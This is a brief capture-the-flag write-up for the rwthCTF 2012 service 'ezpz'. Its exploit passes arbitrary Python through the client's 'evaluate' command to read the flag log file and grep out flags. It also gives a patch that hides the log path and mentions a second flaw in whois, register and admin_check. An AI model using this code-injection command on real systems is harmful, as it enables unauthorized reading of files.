Lobotomy Team

rwthctf2012 -- ezpz

rwthCTF 2012 - ezpz

Flags were stored in log/ezlog and we could got them via ezclient.py

Exploit:


./ezclient.py 10.12.X.10 evaluate 'fl = open("/home/ezpz/log/ezlog","r"); \
	 print fl.read(); fl.close()' | egrep -o -e "\w{16}"

Patch:

mv log `uuid` and change path in ezpz.py from log/ to generated uuid

Also there was another vulnerability, when you could get whois information, register and make admin_check
but we didn't use it because I found it very later